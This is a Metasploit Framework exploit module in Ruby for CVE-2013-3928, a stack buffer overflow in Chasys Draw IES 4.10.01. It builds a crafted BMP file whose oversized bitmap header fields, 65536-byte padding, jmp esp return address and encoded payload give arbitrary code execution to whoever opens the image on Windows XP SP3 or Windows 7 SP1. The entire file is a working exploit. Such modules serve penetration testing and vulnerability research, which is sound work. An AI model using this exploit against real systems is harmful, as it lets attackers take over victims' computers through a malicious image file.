##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Chasys Draw IES Buffer Overflow",
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in Chasys Draw IES
        (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while
        parsing BMP files, where the ReadFile function is used to store user provided data
        on the  stack in a insecure way. It results in arbitrary code execution under the
        context of the user viewing a specially crafted BMP file. This module has been
        tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7
        SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Christopher Gabriel',     # Vulnerability Discovery
          'Longinos Recuero Bustos', # PoC
          'Javier \'soez\'',         # PoC
          'juan vazquez'             # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2013-3928' ],
          [ 'BID', '61463' ],
          [ 'URL', 'http://secunia.com/advisories/53773/' ],
          [ 'URL', 'http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html' ]
        ],
      'Payload'        =>
        {
          'Space'       => 21112, # Indeed there is more space available on the stack, just limited by the trigger
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1',
            {
              'Offset' => 65536,
              'Ret' => 0x10005fd3 # jmp esp # from flt_BMP.dll v4.10.1.0
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jul 26 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.bmp']),
      ], self.class)

  end

  def exploit

    bof = rand_text(target['Offset'])
    bof << [target.ret].pack("V")
    bof << payload.encoded

    bitmap_header = ""
    bitmap_header << [0x28].pack("V")       # HeaderSize
    bitmap_header << [0x4a3].pack("V")      # Width    # Used to trigger the overflow
    bitmap_header << [0x1].pack("V")        # Height
    bitmap_header << [0x9].pack("v")        # Planes   # Used to trigger the overflow
    bitmap_header << [0x41].pack("v")       # BitCount # Used to trigger the overflow
    bitmap_header << [0x0].pack("V")        # Compression
    bitmap_header << [bof.length].pack("V") # SizeImage
    bitmap_header << [0x0].pack("V")        # PelsPerMeterX
    bitmap_header << [0x0].pack("V")        # PelsPerMeterY
    bitmap_header << [0x0].pack("V")        # ClrUse
    bitmap_header << [0x0].pack("V")        # ClrImportant

    total_size = bof.length + bitmap_header.length + 14 # 14 => file header length

    file_header = ""
    file_header << "BM"                     # Signature
    file_header << [total_size].pack("V")   # Size
    file_header << [0].pack("V")            # Reserved
    file_header << [0x36].pack("V")         # BitsOffsets

    bmp = file_header + bitmap_header + bof
    file_create(bmp)
  end
end